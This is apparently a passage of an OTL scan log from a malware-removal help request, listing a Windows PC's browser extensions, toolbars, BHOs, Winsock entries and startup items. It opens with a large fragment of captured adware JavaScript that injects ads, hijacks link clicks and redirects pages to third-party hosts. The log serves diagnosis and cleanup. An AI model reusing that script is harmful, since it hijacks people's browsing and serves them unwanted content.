surl='http://v2.ministerial5.com/creative/2-002136099-00001i;size='+arr,ref=window.self==window.top?window.self.location.href:'';return function(ifr){_zyad.iset(ifr, ''+surl+';tag_id=2401;ref='+ref+'', (atp?atp:1), [597,size]}}catch(e){return !1;}},mari_strm10:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2250216\",\"300x250\":\"2250217\",\"160x600\":\"2250218\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [606,size]}}catch(e){return !1;}},mari_strm10_2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2250209\",\"300x250\":\"2250210\",\"160x600\":\"2250211\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [607,size]}}catch(e){return !1;}},mari_strm_tier1_4:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2250245\",\"300x250\":\"2250246\",\"728x90\":\"2250248\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [608,size]}}catch(e){return !1;}},matomy_strm13_2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"2251075\",\"728x90\":\"2251082\",\"160x600\":\"2251085\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [610,size]}}catch(e){return !1;}},matomy_strm13:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"2251074\",\"728x90\":\"2251077\",\"160x600\":\"2251084\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [611,size]}}catch(e){return !1;}},dsnr_strm_legal:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"2242464\",\"728x90\":\"2242956\",\"160x600\":\"2242957\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '&referrer=[REFERRER_URL]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [614,size]}}catch(e){return !1;}},web3_strm_tb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2251256&size='+size+'', (atp?atp:1), [621,size]}}catch(e){return !1;}},hulk_porn:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600 300x600 250x250 600x400'.indexOf(size)) return !1;var atp=false;var surl='http://syndication.exoclick.com/ads-iframe-display.php?type='+size+'&login=hulkshare_RS2&cat=2&search=&ad_title_color=0000cc&bgcolor=FFFFFF&border=0&border_color=000000&font=&block_keywords=&ad_text_color=000000&ad_durl_color=008000&adult=0&sub=0&text_only=0&show_thumb=0&idzone=' + {\"728x90\":\"638635\",\"300x250\":\"638633\",\"468x60\":\"774737\",\"120x600\":\"774751\",\"160x600\":\"638637\",\"300x600\":\"774753\",\"250x250\":\"774743\",\"600x400\":\"774747\"}[size] + '&idsite=225117&p='+encodeURIComponent(window.self.location.href)+'&dt=' + Math.random(if(!document.getElementById(\"sad32ecs3fdsa\")&&1==Math.ceil(4*Math.random()))try{setTimeout(function(){var b=document.getElementsByTagName(\"body\")[0],a=document.createElement(\"div\"a.setAttribute(\"style\",\"width:728px;height:90px;margin:0 auto\"a.setAttribute(\"id\",\"sad32ecs3fdsa\"a.innerHTML='';b.insertBefore(a,b.firstChild)},1)}catch(e){};;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [420,size]}}catch(e){return !1;}}}};_zyad.init(;(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"Lu0VZKt9=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1
';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(hdocument.getElementById(\"webscorebox_frm\").submit(localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})(;(function(){-1';a.style.position=\"relative\";a.appendChild(b)}document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\")&&(a=document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\"),b=document.createElement(\"div\"),b.setAttribute(\"style\",\"width:100%;height:121%;position:absolute;left:0;top:0\"),b.innerHTML='',a.style.position=\"relative\",a.appendChild(b))},250if(-1').appendTo(\"body\")}}catch(b){}},c=document.createElement(\"script\"c.type=\"text/javascript\";c[-1-1) window.self.location.href='about:blank';if(-1-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://pp.developunit.info/e/?eid=308&hid=4212340447801763361&pid=1795&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random(break}}}catch(d){}})(if(-1==window.self.location.hostname.indexOf('mail.')){for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*ivar c2soffer=document.querySelectorAll('div.c2soffer'if(c2soffer && c2soffer.length && c2soffer.length>0)for(var i=0;iparseInt(\"110.81\")&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://r.searchfun.in/?g=Azm9CdOLv6D6DG4ZhyqZC7YKg70Jv6qTCMVEDc0EgeqRg6bJvNbOCd0GojsGrjUErchXCMhMofb5vNbIDeDPBMY%3D\"var b=new Date;b.setHours(b.getHours()+5document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString(document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch(c){}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};})((function(){void(0)})()" FF - prefs.js..extensions.enabledAddons: lazarus%40interclue.com:2.3 FF - prefs.js..extensions.enabledAddons: wrc%40avast.com:7.0.1455 FF - prefs.js..extensions.enabledAddons: %7B42e50651-9669-456e-9081-d5a836274274%7D:1.0.0 FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:27.0.1 FF - prefs.js..sweetim.toolbar.previous.browser.search.defaulturl: "" FF - prefs.js..sweetim.toolbar.previous.browser.search.selectedEngine: "" FF - prefs.js..browser.startup.homepage: "http://www.seeearch.com/" FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@pack.google.com/Google Updater;version=14: C:\Program Files\Google\Google Updater\2.4.2432.1652\npCIDetect14.dll (Google) FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.) FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.) FF - HKLM\Software\MozillaPlugins\@tools.updaterss.com/SaveSenseLive Update;version=3: C:\Program Files\SaveSenseLive\Update\1.3.23.0\npGoogleUpdate3.dll (SaveSense) FF - HKLM\Software\MozillaPlugins\@tools.updaterss.com/SaveSenseLive Update;version=9: C:\Program Files\SaveSenseLive\Update\1.3.23.0\npGoogleUpdate3.dll (SaveSense) FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.) FF - HKLM\Software\MozillaPlugins\adobe.com/AdobeAAMDetect: C:\Program Files\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll File not found FF - HKCU\Software\MozillaPlugins\@squareclock.com/SQ3DPlayer_Production_Castorama_Internet: C:\Users\APPE-ATELIER\AppData\Local\SquareClock.Production_Castorama_Internet\NPSQ3D.dll (SquareClock SAS) FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\wrc@avast.com: C:\Program Files\Alwil Software\Avast5\WebRep\FF [2013/05/29 14:18:22 | 000,000,000 | ---D | M] FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\fmconverter@gmail.com: C:\Program Files\Freemake\Freemake Video Converter\BrowserPlugin\Firefox\ [2014/01/05 18:28:01 | 000,000,000 | ---D | M] FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\lightningnewtab@gmail.com: C:\Users\APPE-ATELIER\AppData\Roaming\Mozilla\Firefox\Profiles\m6k4uanf.default\extensions\lightningnewtab@gmail.com.xpi FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 27.0.1\extensions\\Components: C:\Program Files\Mozilla Firefox\components FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 27.0.1\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2011/12/24 17:51:27 | 000,000,000 | ---D | M] (No name found) -- C:\Users\APPE-ATELIER\AppData\Roaming\mozilla\Extensions [2014/02/23 10:49:55 | 000,000,000 | ---D | M] (No name found) -- C:\Users\APPE-ATELIER\AppData\Roaming\mozilla\Firefox\Profiles\m6k4uanf.default\extensions [2014/01/23 02:00:04 | 000,270,391 | ---- | M] () (No name found) -- C:\Users\APPE-ATELIER\AppData\Roaming\mozilla\firefox\profiles\m6k4uanf.default\extensions\jid0-O6MIff3eO5dIGf5Tcv8RsJDKxrs@jetpack.xpi [2011/11/07 10:16:43 | 000,246,802 | ---- | M] () (No name found) -- C:\Users\APPE-ATELIER\AppData\Roaming\mozilla\firefox\profiles\m6k4uanf.default\extensions\lazarus@interclue.com.xpi [2014/02/21 05:26:24 | 000,008,114 | ---- | M] () (No name found) -- C:\Users\APPE-ATELIER\AppData\Roaming\mozilla\firefox\profiles\m6k4uanf.default\extensions\{42e50651-9669-456e-9081-d5a836274274}.xpi [2011/12/30 19:54:46 | 000,002,650 | ---- | M] () -- C:\Users\APPE-ATELIER\AppData\Roaming\mozilla\firefox\profiles\m6k4uanf.default\searchplugins\bing.xml [2014/02/22 16:13:40 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\mozilla firefox\browser\extensions [2014/02/22 16:13:40 | 000,000,000 | ---D | M] (Default) -- C:\Program Files\mozilla firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} [2013/05/29 14:18:22 | 000,000,000 | ---D | M] (avast! WebRep) -- C:\PROGRAM FILES\ALWIL SOFTWARE\AVAST5\WEBREP\FF [color=#E56717]========== Chrome ==========[/color] CHR - default_search_provider: Web Search (Enabled) CHR - default_search_provider: search_url = http://www.google.com CHR - default_search_provider: suggest_url = , CHR - homepage: http://www.google.com CHR - plugin: Error reading preferences file CHR - Extension: Documents Google = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.0.0.6_0\ CHR - Extension: Documents Google = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.5_0\ CHR - Extension: Documents Google = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.5_1\ CHR - Extension: Google Drive = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.2_0\ CHR - Extension: Google Drive = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\ CHR - Extension: Google Drive = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_1\ CHR - Extension: YouTube = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.5_0\ CHR - Extension: YouTube = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\ CHR - Extension: YouTube = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_1\ CHR - Extension: Recherche Google = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\ CHR - Extension: Recherche Google = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\ CHR - Extension: Recherche Google = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_1\ CHR - Extension: No name found = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\ippenodjaoidmkkfdlmdhofiebnpjddb\1.0.0_0\ CHR - Extension: No name found = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\jlmgmnhapckhpikkcdfnbcfijmcnnfhe\1.6\ CHR - Extension: No name found = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\lcnnhcneegeeojhgpfijnlnocjdmlaon\1.0.0_0\ CHR - Extension: Google Wallet = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.4.10_0\ CHR - Extension: Google Wallet = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.0_0\ CHR - Extension: Google Wallet = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\ CHR - Extension: MediaPlayerEnhance = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\okanipcmceoeemlbjnmnbdibhgpbllgc\13942.497.6251_0\crossrider CHR - Extension: MediaPlayerEnhance = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\okanipcmceoeemlbjnmnbdibhgpbllgc\13942.497.6251_0\ CHR - Extension: No name found = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbcchiinnmikpddkmbaopjdcpacjedjl\2.2_0\ CHR - Extension: Gmail = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0\ CHR - Extension: Gmail = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\ CHR - Extension: Gmail = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_2\ O1 HOSTS File: ([2014/02/12 13:17:05 | 000,000,871 | ---- | M]) - C:\Windows\System32\drivers\etc\hosts O1 - Hosts: 54.204.28.26 nikdaiaidiiiogaidkkekcmokcgcdeac O2 - BHO: (Browser Companion Helper) - {00cbb66b-1d3b-46d3-9577-323a336acb50} - C:\Program Files\BrowserCompanion\jsloader.dll ( ) O2 - BHO: (Reverso Toolbar) - {09a07b02-f491-4b6b-bfc9-684a624f4f3b} - C:\Program Files\Reverso\prxtbReve.dll (Conduit Ltd.) O2 - BHO: (MediaPlayerEnhance) - {11111111-1111-1111-1111-110411411150} - C:\Program Files\MediaPlayerEnhance\MediaPlayerEnhance-bho.dll (Feven) O2 - BHO: (Plus-HD-5.7) - {11111111-1111-1111-1111-110411901182} - C:\Program Files\Plus-HD-5.7\Plus-HD-5.7-bho.dll (Plus HD) O2 - BHO: (FindRight) - {2c774641-5504-46a8-b63f-6715ae3fe376} - C:\Program Files\FindRight\FindRightbho.dll (FindRight) O2 - BHO: (Babylon toolbar helper) - {2EECD738-5844-4a99-B4B6-146BF802613B} - C:\Program Files\BabylonToolbar\BabylonToolbar\1.8.7.2\bh\BabylonToolbar.dll (Babylon BHO) O2 - BHO: (UTubeAdBllOCk) - {35648F2D-501C-E2DA-A36F-69A4E1F43BD6} - C:\ProgramData\UTubeAdBllOCk\TjtBvk2VRI.dll () O2 - BHO: (IETabPage Class) - {3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C} - C:\Program Files\SupTab\SupTab.dll (Thinknice Co. Limited) O2 - BHO: (Avanquest FR Toolbar) - {6ec85fcf-87ad-41d7-ae1f-f116f8ad4848} - C:\Program Files\Avanquest_FR\prxtbAva2.dll (Conduit Ltd.) O2 - BHO: (SaveSense) - {71e129ff-6c2a-4984-818c-7e2c998b8d99} - C:\Users\APPE-ATELIER\AppData\Local\SaveSense\SaveSenseIE.dll (SaveSense) O2 - BHO: (avast! WebRep) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\Alwil Software\Avast5\aswWebRepIE.dll (AVAST Software) O2 - BHO: (ValueApps) - {93DBF2BB-A2B3-4683-A92E-57E60751F346} - C:\Program Files\Conduit\ValueApps\IE\ValueAppsLoader.dll (Conduit Ltd.) O2 - BHO: (Browser Companion Helper Verifier) - {963B125B-8B21-49A2-A3A8-E37092276531} - C:\Program Files\BrowserCompanion\updatebhoWin32.dll ( ) O2 - BHO: (HomeTab) - {9fdfb66c-713b-4201-83a6-5b78ae227b41} - C:\Program Files\HomeTab\IE\HomeTab.dll (Simply Tech LTD.) O2 - BHO: (DealPly) - {A6174F27-1FFF-E1D6-A93F-BA48AD5DD448} - C:\Program Files\DealPly\DealPlyIE.dll (DealPly Technologies Ltd) O2 - BHO: (MinibarBHO) - {AA74D58F-ACD0-450D-A85E-6C04B171C044} - C:\Program Files\Minibar\Minibar.dll (KangoExtensions) O2 - BHO: (Complitly) - {D27FC31C-6E3D-4305-8D53-ACDAEFA5F862} - C:\Users\APPE-ATELIER\AppData\Roaming\Complitly\Complitly.dll (SimplyGen) O2 - BHO: (Ask Toolbar) - {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files\Ask.com\GenericAskToolbar.dll (Ask) O2 - BHO: (Downloadd KeepEr) - {D8935116-0B6F-A5EA-C9F2-4CAAD181CBCF} - C:\Program Files\Downloadd KeepEr\InmSnqf.dll () O2 - BHO: (Hotspot Shield Class) - {F9E4A054-E9B1-4BC3-83A3-76A1AE736170} - C:\Program Files\Hotspot Shield\HssIE\HssIE.dll (AnchorFree Inc.) O2 - BHO: (no name) - {FD6D90C0-E6EE-4BC6-B9F7-9ED319698007} - No CLSID value found. O3 - HKLM\..\Toolbar: (Reverso Toolbar) - {09a07b02-f491-4b6b-bfc9-684a624f4f3b} - C:\Program Files\Reverso\prxtbReve.dll (Conduit Ltd.) O3 - HKLM\..\Toolbar: (Avanquest FR Toolbar) - {6ec85fcf-87ad-41d7-ae1f-f116f8ad4848} - C:\Program Files\Avanquest_FR\prxtbAva2.dll (Conduit Ltd.) O3 - HKLM\..\Toolbar: (avast! WebRep) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\Alwil Software\Avast5\aswWebRepIE.dll (AVAST Software) O3 - HKLM\..\Toolbar: (Babylon Toolbar) - {98889811-442D-49dd-99D7-DC866BE87DBC} - C:\Program Files\BabylonToolbar\BabylonToolbar\1.8.7.2\BabylonToolbarTlbr.dll (Babylon Ltd.) O3 - HKLM\..\Toolbar: (HomeTab) - {9fdfb66c-713b-4201-83a6-5b78ae227b41} - C:\Program Files\HomeTab\IE\HomeTab.dll (Simply Tech LTD.) O3 - HKLM\..\Toolbar: (no name) - {ae07101b-46d4-4a98-af68-0333ea26e113} - No CLSID value found. O3 - HKLM\..\Toolbar: (Ask Toolbar) - {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files\Ask.com\GenericAskToolbar.dll (Ask) O3 - HKLM\..\Toolbar: (no name) - 10 - No CLSID value found. O3 - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\Toolbar\WebBrowser: (Reverso Toolbar) - {09A07B02-F491-4B6B-BFC9-684A624F4F3B} - C:\Program Files\Reverso\prxtbReve.dll (Conduit Ltd.) O3 - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\Toolbar\WebBrowser: (Avanquest FR Toolbar) - {6EC85FCF-87AD-41D7-AE1F-F116F8AD4848} - C:\Program Files\Avanquest_FR\prxtbAva2.dll (Conduit Ltd.) O4 - HKLM..\Run: [avast] C:\Program Files\Alwil Software\Avast5\avastUI.exe (AVAST Software) O4 - HKLM..\RunOnce: [upfst_fr_83.exe] C:\Users\APPE-ATELIER\AppData\Local\fst_fr_83\upfst_fr_83.exe () O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (Microsoft Corporation) O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (Microsoft Corporation) O4 - HKLM..\RunOnceEx: [ContentMerger] c:\Program Files\Common Files\Roxio Shared\10.0\SharedCOM\ContentMerger10.exe (Sonic Solutions) O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3 O7 - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145 O9 - Extra Button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\Office12\REFIEBAR.DLL (Microsoft Corporation) O9 - Extra Button: Visit AppsHat.com - {AAA38851-3CFF-475F-B5E0-720D3645E4A5} - C:\Program Files\Minibar\Minibar.dll (KangoExtensions) O9 - Extra Button: ShopperReports - Compare product prices - {DB38E21A-0133-419d-92AD-ECDFD5244D6D} - Reg Error: Key error. File not found O9 - Extra Button: ShopperReports - Compare travel rates - {EB620C54-E229-4942-87CE-E717109FC8C6} - Reg Error: Key error. File not found O10 - Protocol_Catalog9\Catalog_Entries\000000000001 - C:\windows\System32\PCProtect.dll (Objectify Media Inc) O10 - Protocol_Catalog9\Catalog_Entries\000000000002 - C:\windows\System32\PCProtect.dll (Objectify Media Inc) O10 - Protocol_Catalog9\Catalog_Entries\000000000003 - C:\windows\System32\PCProtect.dll (Objectify Media Inc) O10 - Protocol_Catalog9\Catalog_Entries\000000000004 - C:\windows\System32\PCProtect.dll (Objectify Media Inc) O10 - Protocol_Catalog9\Catalog_Entries\000000000016 - C:\windows\System32\PCProtect.dll (Objectify Media Inc) O13 - gopher Prefix: missing O15 - HKLM\..Trusted Domains: //about.htm/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: //Exclude.htm/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: //FWEvent.htm/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: //LanguageSelection.htm/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: //Message.htm/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: //MyAgttryCmd.htm/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: //MyAgttryNag.htm/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: //MyNotification.htm/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: //NOCLessUpdate.htm/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: //quarantine.htm/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: //ScanNow.htm/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: //strings.vbs/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: //Template.htm/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: //Update.htm/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: //VirFound.htm/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: mcafee.com ([*] http in Trusted sites) O15 - HKLM\..Trusted Domains: mcafee.com ([*] https in Trusted sites) O15 - HKLM\..Trusted Domains: mcafeeasap.com ([betavscan] http in Trusted sites) O15 - HKLM\..Trusted Domains: mcafeeasap.com ([betavscan] https in Trusted sites) O15 - HKLM\..Trusted Domains: mcafeeasap.com ([vs] http in Trusted sites) O15 - HKLM\..Trusted Domains: mcafeeasap.com ([vs] https in Trusted sites) O15 - HKLM\..Trusted Domains: mcafeeasap.com ([www] http in Trusted sites) O15 - HKLM\..Trusted Domains: mcafeeasap.com ([www] https in Trusted sites) O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 212.27.40.240 212.27.40.241 O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{763D3E3E-11A9-4A18-9B5A-A16568A3DAE0}: DhcpNameServer = 192.168.1.1 O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{7AA3BAF7-26A5-4CEE-8D46-43B37427BA73}: DhcpNameServer = 212.27.40.240 212.27.40.241 O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{7AA3BAF7-26A5-4CEE-8D46-43B37427BA73}: NameServer = 208.67.222.222,208.67.220.220 O18 - Protocol\Handler\base64 {5ACE96C0-C70A-4A4D-AF14-2E7B869345E1} - C:\Program Files\BrowserCompanion\tdataprotocol.dll (Blabbers Communications Ltd) O18 - Protocol\Handler\chrome {5ACE96C0-C70A-4A4D-AF14-2E7B869345E1} - C:\Program Files\BrowserCompanion\tdataprotocol.dll (Blabbers Communications Ltd) O18 - Protocol\Handler\prox {5ACE96C0-C70A-4A4D-AF14-2E7B869345E1} - C:\Program Files\BrowserCompanion\tdataprotocol.dll (Blabbers Communications Ltd) O18 - Protocol\Filter\text/xml {807563E5-5146-11D5-A672-00B0D022E945} - C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE12\MSOXMLMF.DLL (Microsoft Corporation) O20 - AppInit_DLLs: (c:\progra~2\winfil~1\winfil~1.dll) - c:\ProgramData\WinFilter\WinFilter.dll () O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\windows\explorer.exe (Microsoft Corporation) O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\System32\userinit.exe (Microsoft Corporation) O20 - HKLM Winlogon: VMApplet - (SystemPropertiesPerformance.exe) - C:\windows\System32\SystemPropertiesPerformance.exe (Microsoft Corporation) O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found. O32 - HKLM CDRom: AutoRun - 1 O34 - HKLM BootExecute: (autocheck autochk *) O35 - HKLM\..comfile [open] -- "%1" %* O35 - HKLM\..exefile [open] -- "%1" %* O37 - HKLM\...com [@ = comfile] -- "%1" %* O37 - HKLM\...exe [@ = exefile] -- "%1" %* O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3) O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2) O38 - SubSystems\\Windows: (ServerDll=sxssrv,4) NetSvcs: FastUserSwitchingCompatibility - File not found NetSvcs: Ias - C:\windows\System32\ias.dll (Microsoft Corporation) NetSvcs: Nla - File not found NetSvcs: Ntmssvc - File not found NetSvcs: NWCWorkstation - File not found NetSvcs: Nwsapagent - File not found NetSvcs: SRService - File not found NetSvcs: UxTuneUp - C:\Windows\System32\uxtuneup.dll (TuneUp Software GmbH) NetSvcs: WmdmPmSp - File not found NetSvcs: LogonHours - File not found NetSvcs: PCAudit - File not found NetSvcs: helpsvc - File not found NetSvcs: uploadmgr - File not found MsConfig - StartUpFolder: C:^Users^APPE-ATELIER^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^HP_CC38C23C-7824-4DBB-AC73-997CD0BBFEC7.lnk - - File not found MsConfig - StartUpFolder: C:^Users^APPE-ATELIER^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Lanceur.lnk - C:\PROGRA~1\MICROA~1\LAUNCH~1.EXE - (Micro Application) MsConfig - StartUpReg: [b]Adobe ARM[/b] - hkey= - key= - C:\Program Files\Common 